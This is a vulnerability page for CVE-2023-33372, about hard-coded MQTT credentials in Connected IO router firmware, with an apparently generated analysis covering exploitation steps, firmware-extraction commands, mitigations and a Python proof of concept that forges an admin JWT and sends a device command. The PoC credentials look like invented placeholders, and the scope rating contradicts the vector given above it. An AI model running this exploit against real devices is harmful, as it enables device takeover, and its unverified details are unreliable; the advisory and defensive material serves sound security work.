CVE-2023-33372
CVE-2023-33372
9.8
CriticalPublished:
Last updated:
Source:cve@mitre.org
Modified
Weakness (CWE)
CVSS Vector
v3.1- Attack Vector
- Network
- Attack Complexity
- Low
- Privileges Required
- None
- User Interaction
- None
- Scope
- Unchanged
- Confidentiality
- High
- Integrity
- High
- Availability
- High
Description
Connected IO v2.1.0 and prior uses a hard-coded username/password pair embedded in their device's firmware used for device communication using MQTT. An attacker who gained access to these credentials is able to connect to the MQTT broker and send messages on behalf of devices, impersonating them. in order to sign and verify JWT session tokens, allowing attackers to sign arbitrary session tokens and bypass authentication.
Comprehensive Technical Analysis of CVE-2023-33372
CVE ID: CVE-2023-33372 CVSS Score: 9.8 (Critical) Affected Software: Connected IO firmware v2.1.0 and prior Vulnerability Type: Hard-coded Credentials with JWT Authentication Bypass
1. Vulnerability Assessment and Severity Evaluation
Vulnerability Overview
CVE-2023-33372 is a critical authentication bypass vulnerability in Connected IO’s embedded firmware (v2.1.0 and prior) due to:
- Hard-coded MQTT credentials embedded in the firmware.
- JWT (JSON Web Token) signature manipulation, allowing attackers to forge session tokens.
CVSS v3.1 Breakdown (Score: 9.8 - Critical)
| Metric | Value | Explanation |
|---|---|---|
| Attack Vector (AV) | Network (N) | Exploitable remotely over the network. |
| Attack Complexity (AC) | Low (L) | No special conditions required; credentials are static. |
| Privileges Required (PR) | None (N) | No prior authentication needed. |
| User Interaction (UI) | None (N) | No user action required. |
| Scope (S) | Changed (C) | Compromise affects other components (MQTT broker, JWT signing). |
| Confidentiality (C) | High (H) | Attacker can impersonate devices, exfiltrate data. |
| Integrity (I) | High (H) | Attacker can send malicious MQTT messages, forge JWTs. |
| Availability (A) | High (H) | Potential for DoS or unauthorized control of devices. |
Severity Justification
- Critical (9.8) due to:
- Remote exploitation without authentication.
- High impact on confidentiality, integrity, and availability.
- Low attack complexity (hard-coded credentials are easily extractable).
- Scope change (compromise of one device can lead to broader network impact).
2. Potential Attack Vectors and Exploitation Methods
Attack Vectors
-
Network-Based Exploitation
- An attacker with access to the same network as the Connected IO device can:
- Extract hard-coded MQTT credentials from firmware (via reverse engineering or leaked firmware).
- Connect to the MQTT broker and impersonate legitimate devices.
- Intercept, modify, or inject MQTT messages to manipulate device behavior.
- An attacker with access to the same network as the Connected IO device can:
-
JWT Forgery Attack
- The vulnerability allows attackers to:
- Sign arbitrary JWTs using the hard-coded key.
- Bypass authentication by presenting forged tokens to the device or backend services.
- Escalate privileges if JWTs are used for role-based access control (RBAC).
- The vulnerability allows attackers to:
-
Supply Chain & Firmware Analysis
- Attackers may:
- Obtain firmware (via vendor website, OTA updates, or physical extraction).
- Reverse-engineer the firmware to extract credentials.
- Develop automated exploits for mass compromise.
- Attackers may:
Exploitation Steps
-
Firmware Extraction & Analysis
- Download firmware from Connected IO’s website or intercept OTA updates.
- Use tools like Binwalk, Ghidra, or IDA Pro to extract and analyze the firmware.
- Locate hard-coded credentials (e.g., in
/etc/mqtt_config,/etc/jwt_keys).
-
MQTT Broker Connection
- Use extracted credentials to connect to the MQTT broker (e.g.,
mosquitto_pub,MQTT.fx). - Subscribe to topics (e.g.,
connectedio/device/#) to monitor or inject messages.
- Use extracted credentials to connect to the MQTT broker (e.g.,
-
JWT Forgery
- Extract the JWT signing key from firmware.
- Use tools like JWT.io, PyJWT, or custom scripts to generate valid tokens.
- Present forged tokens to bypass authentication on the device or cloud backend.
-
Post-Exploitation
- Device Impersonation: Send malicious commands (e.g., reboot, firmware update).
- Data Exfiltration: Intercept sensitive telemetry or configuration data.
- Lateral Movement: If the device is part of an IoT/OT network, pivot to other systems.
3. Affected Systems and Software Versions
Vulnerable Products
- Connected IO Routers (all models running firmware v2.1.0 and prior).
- Potential Impact:
- Industrial IoT (IIoT) deployments.
- Smart city infrastructure.
- Remote monitoring and telemetry systems.
Verification Methods
- Firmware Version Check:
- Via device web interface (
http://<device-ip>/version). - Via CLI (
cat /etc/firmware_version).
- Via device web interface (
- Exploit Confirmation:
- Attempt MQTT connection with default credentials.
- Test JWT forgery using extracted keys.
4. Recommended Mitigation Strategies
Immediate Actions
| Mitigation | Description | Effectiveness |
|---|---|---|
| Firmware Update | Apply the latest patched firmware from Connected IO. | High (if available) |
| Network Segmentation | Isolate vulnerable devices in a separate VLAN with strict ACLs. | Medium (limits lateral movement) |
| MQTT Broker Hardening | - Disable anonymous access. - Enforce TLS for MQTT. - Implement IP whitelisting. | High (prevents unauthorized connections) |
| JWT Key Rotation | Replace hard-coded JWT keys with dynamically generated keys. | High (prevents forgery) |
| Disable Unused Services | Turn off MQTT if not required. | Medium (reduces attack surface) |
Long-Term Remediation
-
Secure Development Practices
- Eliminate hard-coded credentials (use secure storage like TPM/HSM).
- Implement secure boot to prevent firmware tampering.
- Use unique per-device credentials (e.g., derived from device serial numbers).
-
Runtime Protections
- Deploy IDS/IPS to detect anomalous MQTT traffic.
- Enable MQTT message signing to prevent tampering.
- Monitor JWT anomalies (e.g., unexpected token issuance).
-
Vendor Coordination
- Patch Management: Ensure all devices receive updates.
- Transparency: Disclose vulnerabilities via coordinated disclosure (e.g., CERT/CC).
5. Impact on the Cybersecurity Landscape
Broader Implications
- IoT/IIoT Security Risks:
- Highlights the prevalence of hard-coded credentials in embedded systems.
- Demonstrates JWT misconfigurations as a critical attack vector.
- Supply Chain Threats:
- Attackers may target firmware updates to distribute backdoors.
- Third-party components (e.g., MQTT libraries) may introduce vulnerabilities.
- Regulatory & Compliance Concerns:
- GDPR, NIST, ISO 27001 violations if sensitive data is exposed.
- Industrial control systems (ICS) may face increased scrutiny.
Historical Context
- Similar vulnerabilities:
- CVE-2017-6077 (D-Link hard-coded credentials).
- CVE-2021-22893 (Pulse Secure JWT forgery).
- Trend: Increasing exploitation of IoT authentication flaws in critical infrastructure.
6. Technical Details for Security Professionals
Firmware Analysis Workflow
-
Obtain Firmware
- Download from vendor: Connected IO Routers.
- Extract via UART/JTAG if physical access is available.
-
Static Analysis
- Binwalk:
binwalk -e firmware.bin - Strings:
strings firmware.bin | grep -i "mqtt\|jwt\|password" - Ghidra/IDA Pro: Reverse-engineer to locate credential storage.
- Binwalk:
-
Dynamic Analysis
- QEMU Emulation: Run firmware in an emulated environment.
- Network Sniffing: Use Wireshark to capture MQTT/JWT traffic.
Exploitation Proof of Concept (PoC)
import paho.mqtt.client as mqtt
import jwt
import time
# Extracted hard-coded credentials
MQTT_BROKER = "mqtt.connectedio.com"
MQTT_USER = "admin"
MQTT_PASS = "s3cr3tP@ss"
JWT_SECRET = "hardcoded_jwt_key_123"
# Step 1: Connect to MQTT Broker
def on_connect(client, userdata, flags, rc):
print(f"Connected with result code {rc}")
client.subscribe("connectedio/device/#")
client = mqtt.Client()
client.username_pw_set(MQTT_USER, MQTT_PASS)
client.on_connect = on_connect
client.connect(MQTT_BROKER, 1883, 60)
# Step 2: Forge JWT
payload = {
"sub": "malicious_device",
"iat": int(time.time()),
"exp": int(time.time()) + 3600,
"role": "admin"
}
token = jwt.encode(payload, JWT_SECRET, algorithm="HS256")
# Step 3: Publish malicious MQTT message
client.publish("connectedio/device/command", f'{{"action": "reboot", "auth": "{token}"}}')
client.loop_forever()
Detection & Forensics
- Network Indicators:
- Unusual MQTT connections from unknown IPs.
- JWT tokens with unexpected
iat/expvalues.
- Log Analysis:
- Check MQTT broker logs for failed authentication attempts.
- Monitor JWT validation failures in backend services.
Hardening Recommendations for Developers
- Use Hardware Security Modules (HSMs) for key storage.
- Implement OAuth2/OIDC instead of static JWT keys.
- Enforce MQTT over TLS (MQTTs) with mutual authentication (mTLS).
- Rotate credentials periodically via secure OTA updates.
Conclusion
CVE-2023-33372 represents a critical authentication bypass in Connected IO devices, stemming from hard-coded credentials and JWT misconfigurations. The vulnerability enables remote exploitation with severe impact, including device impersonation, data exfiltration, and lateral movement in IoT/OT networks.
Immediate action is required to patch affected systems, harden MQTT/JWT implementations, and monitor for exploitation attempts. Security teams should prioritize firmware updates, network segmentation, and runtime protections to mitigate risks.
For further details, refer to:
References
cve@mitre.org
https://www.connectedio.com/products/routersaf854a3a-2127-422b-91ae-364da2661108
https://claroty.com/team82/disclosure-dashboard/cve-2023-33372af854a3a-2127-422b-91ae-364da2661108
https://www.connectedio.com/products/routers